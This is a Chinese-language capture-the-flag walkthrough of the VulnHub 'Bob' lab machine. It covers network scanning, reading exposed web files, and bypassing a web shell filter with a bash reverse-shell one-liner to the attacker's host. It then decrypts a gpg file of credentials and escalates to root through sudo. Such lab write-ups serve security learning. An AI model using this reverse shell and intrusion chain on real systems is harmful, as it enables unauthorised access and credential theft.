Bob

作者：jason_huawen

靶机信息

名称：Bob: 1.0.1

地址：

https://www.vulnhub.com/entry/bob-101,226/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a5:49:23      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.101  08:00:27:6f:48:2f      1      60  PCS Systemtechnik GmbH       

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.101

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.101 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 05:06 EST
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 84f2f8e5ed3e14f393d41e4c413ba2a9 (RSA)
|   256 5b98c74f846efd566a351683aa9ceaf8 (ECDSA)
|_  256 391656fb4e0f508540d3532241433815 (ED25519)
MAC Address: 08:00:27:6F:48:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds

NMAP扫描结果表明目标主机有2个开放端口：80（HTTP）、25468（SSH）

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/lat_memo.html
<html>
  
  <body>
    <div id="back">
    <div id="banner" alt="School Banner">
        <img src="school_badge.png" id="logo">
        <div id="bannertext">
          <h1> Milburg Highschool </h1>
          <a href="index.html">Home</a>
          <a href="news.html">News</a>
          <a href="about.html">About Us</a>
          <a href="contact.html">Contact Us</a>
          <a href="login.html">Login</a>
      </div>
    </div>
    <div id="memocontainer">
      <p>
        Memo sent at GMT+10:00 2:37:42 by User: Bob
        <br>
        Hey guys IT here don't forget to check your emails regarding the recent security breach.
        There is a web shell running on the server with no protection but it should be safe as
        I have ported over the filter from the old windows server to our new linux one. Your email
        will have the link to the shell.<br>
        <br>
        -Bob
      </p>
    </div>
  </div>
  </body>
</html>

表明用户名为bob,命令执行功能有过滤机制

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/passwords.html
<!-- N.T.S Get Sticky Notes to Write Passwords in
-Bob
-->
<!--

-=====Passwords:==-<!
=======-
-->
<!--
-=====WEBSHELL=======-
-->
<!--p
-->
<!--
-====================-

 -->
<html>
<body>
  Really who made this file at least get a hash of your password to display,
  hackers can't do anything with a hash, this is probably why we had a security
  breach in the first place. Comeon
  people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime
  someone does something as stupid as this. We will have a meeting about this and other
  stuff I found on the server. >:(
<br>
  -Bob
  </fieldset>
</body>
</html>
                        

难道这个就是bob的密码，无论如何，先尝试一下

──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh [email protected] -p 25468
The authenticity of host '[192.168.56.101]:25468 ([192.168.56.101]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.101]:25468' (ED25519) to the list of known hosts.
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 

似乎不对，那再来看一下web shell

看来过滤机制很弱，试了几个就可以成功得到shell

bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'

在Kali Linux得到反弹回来的shell

──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.101] 36358
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$ 

www-data@Milburg-High:/var/www/html$ cat .hint
cat .hint
Have you tried spawning a tty shell?
Also don't forget to check for hidden files ;)
www-data@Milburg-High:/var/www/html$ which python
which python
/usr/bin/python
www-data@Milburg-High:/var/www/html$ python -c 'import pty;pty.spawn("/bin/bash")'
<html$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$ 

<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh中每句的第一个字母合起来就是HARPOCRATES，是个古希腊神话人物的名字。

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

这里有jc等用户的密码

但是直接在目标主机执行gpg解密会出错：

jc@Milburg-High:/home/bob/Documents$ gpg --decrypt /home/bob/Documents/login.txt.gpg
<ts$ gpg --decrypt /home/bob/Documents/login.txt.gpg
gpg: AES encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key

可将Login.txt.gpg文件下载到Kali linux本地进行解密

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ wget http://192.168.56.101:8000/login.txt.gpg                       
--2023-02-01 05:38:50--  http://192.168.56.101:8000/login.txt.gpg
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘login.txt.gpg’

login.txt.gpg                   100%[=====================================================>]      91  --.-KB/s    in 0s      

2023-02-01 05:38:50 (28.0 MB/s) - ‘login.txt.gpg’ saved [91/91]

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ls
linpeas.sh  login.txt.gpg  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ gpg -d login.txt.gpg 
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: AES.CFB encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

成功得到bob的密码。

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh [email protected] -p 25468              
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


[email protected]'s password: 
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar  8 23:49:12 2018 from 192.168.56.1
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
[sudo] password for bob: 
Matching Defaults entries for bob on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on Milburg-High:
    (ALL : ALL) ALL
bob@Milburg-High:~$ sudo /bin/bash
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# cd /root